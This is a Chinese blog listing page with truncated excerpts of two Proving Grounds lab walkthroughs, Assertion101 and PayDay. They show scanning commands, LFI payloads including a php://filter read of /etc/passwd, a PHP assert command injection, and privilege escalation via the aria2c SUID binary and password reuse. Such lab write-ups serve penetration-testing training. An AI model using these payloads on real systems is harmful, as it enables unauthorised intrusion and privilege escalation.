發表文章

目前顯示的是有「lfi」標籤的文章

Proving Grounds Play : Assertion101 Walkthrough

圖片
  Proving Grounds Play : Assertion101 Walkthrough Foothold : 80 網站是一個 PHP 網站,傳統的幾種 Path Traversal 無作用 參考 Hacktricks 其他 PHP Path Traversal 後發現使用 assert 的方式成功執行命令讀取檔案 獲取某使用者 id_rsa 後成功登入 PE : SUID 發現 aria2c 利用,利用覆蓋 /etc/passwd 後成功提權 Rustscan,└─$ rustscan -a 192.168.151.94 --scripts none --ulimit 5000 | tee rustscan snmp check,└─$ sudo nmap -sU -p 161 192.168.151.94 | tee snmp          nmap whatweb 80 / 80 /robots.txt 點了幾個網頁發現 index.php 會帶 Query String ?page=ooxx 馬上測試一下 ?page=../../../../../../../../etc/passwd 兄弟,沒有這麼簡單!.......機車的網頁 測試 RFI,看來沒有作用 gobuster 80 /about.php 80 /css 80 /fonts 80 /img 80 /js 80 /pages 80 /schedule.php PHP Wrappers 包裝器測試,http://192.168.151.94/index.php?page=php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd 參考 hacktricks 其他有關 Path Traversal 的測試 https://book.hacktricks.xyz/pentesting-web/file-inclusion 測試到 LFI iva PHP's "assert" 測試到這一個 ' and die(system("id")) or ' 成功顯示 id 資訊如下圖 http://192.168....

Proving Grounds Practice : PayDay Walkthrough

圖片
 Proving Grounds Practice : PayDay Walkthrough Foothole (立足點 ) : 80 Port 發現 CMS " CS-Cart ",Searchsploit 後發現 LFI 可以成功讀到 /etc/passwd 接著查看 /?version 發現版本就是 1.3.3 然後使用另一個 RCE 48891 依據說明上傳 *.phtml 然後執行利用拿到 reverse shell PE ( 提權 ) : 現有使用者 www-data 甚麼權限都沒有 直接列舉使用者 patrick 發現密碼一樣可以 ssh 登入 sudo -l 後提 權成功 注意事項 : SSH 發現  no matching host key type found. Their offer: ssh-rsa,ssh-dss 透過修改 ~/.ssh/config 可以成功登入 參考  https://blog.alanwei.com/blog/2022/01/24/ssh-no-matching-host-key-type-found/ Linux 一定要測試帳號密碼兩個都一樣的切換嘗試 第一步 Rustscan,└─$ rustscan -a 192.168.187.39 --scripts none  --ulimit 5000 | tee rustscan snmp closed,└─$ sudo nmap -sU -p 161 192.168.187.39 | tee snmp nmap,└─$ sudo nmap -sCV -A -p 22,80,110,139,143,445,993,995 192.168.187.39 | tee nmap 22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0) 80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) 110/tcp open  pop3 ...